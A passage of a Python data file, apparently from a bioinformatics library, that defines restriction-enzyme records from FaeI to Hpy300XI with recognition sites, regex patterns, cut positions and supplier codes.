'freq': 256.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATG',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['FaeI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'YATR'),
'compsite': '(?=(?P<FaiI>[CT]AT[AG]))',
'dna': None,
'freq': 64.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'YATR',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['FaiI'] = _temp()
def _temp():
return {
'charac': (-8, -24, 24, 8, 'AAGNNNNNCTT'),
'compsite': '(?=(?P<FalI>AAG.....CTT))',
'dna': None,
'freq': 4096.0,
'fst3': -24,
'fst5': -8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 8,
'scd5': 24,
'site': 'AAGNNNNNCTT',
'size': 11,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['FalI'] = _temp()
def _temp():
return {
'charac': (15, 14, None, None, 'GGGAC'),
'compsite': '(?=(?P<FaqI>GGGAC))|(?=(?P<FaqI_as>GTCCC))',
'dna': None,
'freq': 1024.0,
'fst3': 14,
'fst5': 15,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGAC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['FaqI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CATG'),
'compsite': '(?=(?P<FatI>CATG))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATG',
'size': 4,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['FatI'] = _temp()
def _temp():
return {
'charac': (9, 6, None, None, 'CCCGC'),
'compsite': '(?=(?P<FauI>CCCGC))|(?=(?P<FauI_as>GCGGG))',
'dna': None,
'freq': 1024.0,
'fst3': 6,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['FauI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CATATG'),
'compsite': '(?=(?P<FauNDI>CATATG))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATATG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['FauNDI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TGATCA'),
'compsite': '(?=(?P<FbaI>TGATCA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGATCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['FbaI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GTMKAC'),
'compsite': '(?=(?P<FblI>GT[AC][GT]AC))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'MK',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTMKAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['FblI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCVGAG'),
'compsite': '(?=(?P<Fco1691IV>GC[ACG]GAG))|(?=(?P<Fco1691IV_as>CTC[CGT]GC))',
'dna': None,
'freq': 1365.3333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCVGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Fco1691IV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGGAC'),
'compsite': '(?=(?P<FinI>GGGAC))|(?=(?P<FinI_as>GTCCC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGAC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['FinI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GGNCC'),
'compsite': '(?=(?P<FmuI>GG.CC))',
'dna': None,
'freq': 256.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNCC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['FmuI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCNGC'),
'compsite': '(?=(?P<Fnu4HI>GC.GC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Fnu4HI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGCG'),
'compsite': '(?=(?P<FnuDII>CGCG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCG',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['FnuDII'] = _temp()
def _temp():
return {
'charac': (14, 13, None, None, 'GGATG'),
'compsite': '(?=(?P<FokI>GGATG))|(?=(?P<FokI_as>CATCC))',
'dna': None,
'freq': 1024.0,
'fst3': 13,
'fst5': 14,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B', 'I', 'J', 'K', 'M', 'N', 'V', 'X', 'Y'),
}
rest_dict['FokI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GRGCYC'),
'compsite': '(?=(?P<FriOI>G[AG]GC[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'RGCY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRGCYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['FriOI'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'GGCCGGCC'),
'compsite': '(?=(?P<FseI>GGCCGGCC))',
'dna': None,
'freq': 65536.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCCGGCC',
'size': 8,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['FseI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCNGC'),
'compsite': '(?=(?P<Fsp4HI>GC.GC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Fsp4HI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'RTGCGCAY'),
'compsite': '(?=(?P<FspAI>[AG]TGCGCA[CT]))',
'dna': None,
'freq': 16384.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RTGCGCAY',
'size': 8,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['FspAI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTAG'),
'compsite': '(?=(?P<FspBI>CTAG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTAG',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['FspBI'] = _temp()
def _temp():
return {
'charac': (14, 16, None, None, 'CC'),
'compsite': '(?=(?P<FspEI>CC))|(?=(?P<FspEI_as>GG))',
'dna': None,
'freq': 16.0,
'fst3': 16,
'fst5': 14,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CC',
'size': 2,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['FspEI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TGCGCA'),
'compsite': '(?=(?P<FspI>TGCGCA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGCGCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'N'),
}
rest_dict['FspI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GARGAAG'),
'compsite': '(?=(?P<FspPK15I>GA[AG]GAAG))|(?=(?P<FspPK15I_as>CTTC[CT]TC))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GARGAAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['FspPK15I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAACA'),
'compsite': '(?=(?P<FtnUV>GAAACA))|(?=(?P<FtnUV_as>TGTTTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAACA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['FtnUV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGCGCAGG'),
'compsite': '(?=(?P<GauT27I>CGCGCAGG))|(?=(?P<GauT27I_as>CCTGCGCG))',
'dna': None,
'freq': 65536.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCGCAGG',
'size': 8,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['GauT27I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ATGCAC'),
'compsite': '(?=(?P<Gba708II>ATGCAC))|(?=(?P<Gba708II_as>GTGCAT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGCAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Gba708II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGGCCR'),
'compsite': '(?=(?P<GdiII>CGGCC[AG]))|(?=(?P<GdiII_as>[CT]GGCCG))',
'dna': None,
'freq': 2048.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGCCR',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['GdiII'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCGC'),
'compsite': '(?=(?P<GlaI>GCGC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['GlaI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCNGC'),
'compsite': '(?=(?P<GluI>GC.GC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['GluI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CCCAGC'),
'compsite': '(?=(?P<GsaI>CCCAGC))|(?=(?P<GsaI_as>GCTGGG))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CCAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCAGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['GsaI'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'CTGGAG'),
'compsite': '(?=(?P<GsuI>CTGGAG))|(?=(?P<GsuI_as>CTCCAG))',
'dna': None,
'freq': 4096.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['GsuI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'WGGCCW'),
'compsite': '(?=(?P<HaeI>[AT]GGCC[AT]))',
'dna': None,
'freq': 1024.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'WGGCCW',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HaeI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'RGCGCY'),
'compsite': '(?=(?P<HaeII>[AG]GCGC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'GCGC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGCGCY',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'K', 'N', 'R'),
}
rest_dict['HaeII'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGCC'),
'compsite': '(?=(?P<HaeIII>GGCC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'),
}
rest_dict['HaeIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCGG'),
'compsite': '(?=(?P<HapII>CCGG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGG',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['HapII'] = _temp()
def _temp():
return {
'charac': (17, 9, None, None, 'TGGCCA'),
'compsite': '(?=(?P<HauII>TGGCCA))',
'dna': None,
'freq': 4096.0,
'fst3': 9,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGGCCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HauII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCCCAG'),
'compsite': '(?=(?P<HbaII>GCCCAG))|(?=(?P<HbaII_as>CTGGGC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HbaII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGANNNNNNTCC'),
'compsite': '(?=(?P<HdeNY26I>CGA......TCC))|(?=(?P<HdeNY26I_as>GGA......TCG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGANNNNNNTCC',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HdeNY26I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCANNNNNNTCC'),
'compsite': '(?=(?P<HdeZA17I>GCA......TCC))|(?=(?P<HdeZA17I_as>GGA......TGC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCANNNNNNTCC',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HdeZA17I'] = _temp()
def _temp():
return {
'charac': (10, 10, None, None, 'GACGC'),
'compsite': '(?=(?P<HgaI>GACGC))|(?=(?P<HgaI_as>GCGTC))',
'dna': None,
'freq': 1024.0,
'fst3': 10,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['HgaI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GWGCWC'),
'compsite': '(?=(?P<HgiAI>G[AT]GC[AT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'WGCW',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GWGCWC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HgiAI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGYRCC'),
'compsite': '(?=(?P<HgiCI>GG[CT][AG]CC))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GYRC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGYRCC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HgiCI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACCNNNNNNGGT'),
'compsite': '(?=(?P<HgiEII>ACC......GGT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCNNNNNNGGT',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HgiEII'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GRGCYC'),
'compsite': '(?=(?P<HgiJII>G[AG]GC[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'RGCY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRGCYC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HgiJII'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCGC'),
'compsite': '(?=(?P<HhaI>GCGC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'N', 'Q', 'R', 'X'),
}
rest_dict['HhaI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GRCGYC'),
'compsite': '(?=(?P<Hin1I>G[AG]CG[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRCGYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Hin1I'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CATG'),
'compsite': '(?=(?P<Hin1II>CATG))',
'dna': None,
'freq': 256.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATG',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Hin1II'] = _temp()
def _temp():
return {
'charac': (-8, -24, 24, 8, 'GAYNNNNNVTC'),
'compsite': '(?=(?P<Hin4I>GA[CT].....[ACG]TC))|(?=(?P<Hin4I_as>GA[CGT].....[AG]TC))',
'dna': None,
'freq': 682.6666666666666,
'fst3': -24,
'fst5': -8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 8,
'scd5': 24,
'site': 'GAYNNNNNVTC',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hin4I'] = _temp()
def _temp():
return {
'charac': (11, 5, None, None, 'CCTTC'),
'compsite': '(?=(?P<Hin4II>CCTTC))|(?=(?P<Hin4II_as>GAAGG))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTTC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hin4II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCGC'),
'compsite': '(?=(?P<Hin6I>GCGC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Hin6I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCGC'),
'compsite': '(?=(?P<HinP1I>GCGC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['HinP1I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTYRAC'),
'compsite': '(?=(?P<HincII>GT[CT][AG]AC))',
'dna': None,
'freq': 1024.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTYRAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'N', 'O', 'Q', 'R', 'X'),
}
rest_dict['HincII'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTYRAC'),
'compsite': '(?=(?P<HindII>GT[CT][AG]AC))',
'dna': None,
'freq': 1024.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTYRAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'M', 'S', 'V'),
}
rest_dict['HindII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'AAGCTT'),
'compsite': '(?=(?P<HindIII>AAGCTT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AGCT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AAGCTT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X', 'Y'),
}
rest_dict['HindIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GANTC'),
'compsite': '(?=(?P<HinfI>GA.TC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'ANT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GANTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'V', 'X', 'Y'),
}
rest_dict['HinfI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTTAAC'),
'compsite': '(?=(?P<HpaI>GTTAAC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTTAAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['HpaI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCGG'),
'compsite': '(?=(?P<HpaII>CCGG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGG',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'I', 'N', 'Q', 'R', 'V', 'X'),
}
rest_dict['HpaII'] = _temp()
def _temp():
return {
'charac': (13, 7, None, None, 'GGTGA'),
'compsite': '(?=(?P<HphI>GGTGA))|(?=(?P<HphI_as>TCACC))',
'dna': None,
'freq': 1024.0,
'fst3': 7,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTGA',
'size': 5,
'substrat': 'DNA',
'suppl': ('B', 'N'),
}
rest_dict['HphI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTNNAC'),
'compsite': '(?=(?P<Hpy166II>GT..AC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTNNAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Hpy166II'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TCNNGA'),
'compsite': '(?=(?P<Hpy178III>TC..GA))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCNNGA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hpy178III'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TCNGA'),
'compsite': '(?=(?P<Hpy188I>TC.GA))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCNGA',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Hpy188I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TCNNGA'),
'compsite': '(?=(?P<Hpy188III>TC..GA))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCNNGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Hpy188III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCTYNA'),
'compsite': '(?=(?P<Hpy300XI>CCT[CT].A))|(?=(?P<Hpy300XI_as>T.[AG]AGG))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
